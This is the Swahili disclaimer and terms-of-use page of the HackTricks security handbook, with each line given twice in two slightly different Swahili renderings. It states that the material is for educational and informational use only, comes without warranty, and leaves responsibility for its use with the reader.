**Kwa kuingia au kutumia HackTricks, unakubali kufuata masharti ya leseni hii. Ikiwa hukubaliani na masharti haya, tafadhali, usiingie kwenye tovuti hii.** **Kwa kufikia au kutumia HackTricks, unakubali kuzingatia masharti ya leseni hii. Ikiwa hukubaliani na masharti haya, tafadhali usifanyi matumizi ya tovuti hii.**
## **KIDOKEZO CHA KUTOHUSIKA** ## **Disclaimer**
> [!CAUTION] > [!CAUTION]
> Kitabu hiki, 'HackTricks,' kimetengenezwa kwa madhumuni ya elimu na taarifa tu. Maudhui ndani ya kitabu hiki yanatolewa kwa hali ya "kama yalivyo", na waandishi na wachapishaji hawatoa uwakilishi wala dhamana ya aina yoyote, iwe bayana au iliyotamkwa, kuhusu ukamilifu, usahihi, uimara, uwajibikaji, ubora, au upatikana wa taarifa, bidhaa, huduma, au michoro inayohusiana iliyomo katika kitabu hiki. Kila tegemezi unaloweka kwenye taarifa hizo ni kwa hatari yako wewe mwenyewe. > Kitabu hiki, 'HackTricks,' kimekusudiwa kwa madhumuni ya elimu na taarifa tu. Yaliyomo ndani ya kitabu hiki yanatolewa kwa msingi wa 'kama ilivyo', na waandishi na wachapishaji hawatoi uwakilishi wala dhamana ya aina yoyote, kwa wazi au kwa kauli, kuhusu ukamilifu, usahihi, uaminifu, ufaa, au upatikanaji wa habari, bidhaa, huduma, au michoro inayohusiana katika kitabu hiki. Kila utegemezi utakaoamuriwa juu ya habari hizo upo kwa hatari yako mwenyewe.
> >
> Waandishi na wachapishaji hawatakuwa chini ya hatima yeyote walau ya hasara au uharibifu wowote, ikiwa ni pamoja na, bila kikomo, hasara za moja kwa moja au za matokeo, au hasara yoyote ile inayotokana na upotevu wa data au faida zinazotokana na, au kuhusiana na, matumizi ya kitabu hiki. > Waandishi na wachapishaji hawatajibu kwa hasara yoyote au uharibifu wowote, ikiwemo bila kikomo, hasara isiyo ya moja kwa moja au uharibifu wa matokeo, au hasara yoyote ile iliyosababishwa na upotevu wa data au faida inayotokana na, au kwa kuhusiana na, matumizi ya kitabu hiki.
> >
> Zaidi ya hayo, mbinu na vidokezo vilivyoripotiwa katika kitabu hiki vinatolewa kwa madhumuni ya elimu na taarifa tu, na havipaswi kutumika kwa shughuli zozote haramu au zenye madhara. Waandishi na wachapishaji hawakubali wala kuunga mkono shughuli zozote haramu au zisizo za kimaadili, na matumizi yoyote ya taarifa zinazomo katika kitabu hiki ni kwa hatari na uamuzi wa mtumiaji. > Aidha, mbinu na vidokezo vilivyoelezwa katika kitabu hiki vinatolewa kwa madhumuni ya elimu na taarifa tu, na haviwezi kutumika kwa shughuli haramu au za uharibifu. Waandishi na wachapishaji hawapendelei wala kuunga mkono vitendo vyovyote haramu au visivyo vya maadili, na matumizi yoyote ya habari zilizo ndani ya kitabu hiki ni kwa hatari na uamuzi wa mtumiaji.
> >
> Mtumiaji ndiye mwenye jukumu kamili kwa vitendo vyovyote anavyochukua kwa msingi wa taarifa zilizomo ndani ya kitabu hiki, na anapaswa kila wakati kutafuta ushauri wa kitaalamu na msaada wakati anajaribu kutekeleza mbinu au vidokezo vilivyotajwa hapa. > Mtumiaji ndiye mwenye jukumu kikamilifu kwa hatua zozote zitakazochukuliwa kutokana na habari zilizo katika kitabu hiki, na anapaswa kila wakati kutafuta ushauri na msaada wa mtaalamu anapojaribu kutekeleza mbinu au vidokezo vilivyoelezwa hapa.
> >
> Kwa kutumia kitabu hiki, mtumiaji anakubali kumwachilia waandishi na wachapishaji kutoka kwa uzito wowote wa dhamana na uwajibikaji kwa uharibifu, hasara, au madhara yanayoweza kutokea kutokana na matumizi ya kitabu hiki au taarifa zilizomo ndani yake. > Kwa kutumia kitabu hiki, mtumiaji anakubali kumtolea waandishi na wachapishaji dhamana na wajibu wowote kwa hasara, uharibifu, au madhara yatakayoweza kutokana na matumizi ya kitabu hiki au habari yoyote iliyomo ndani yake.
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}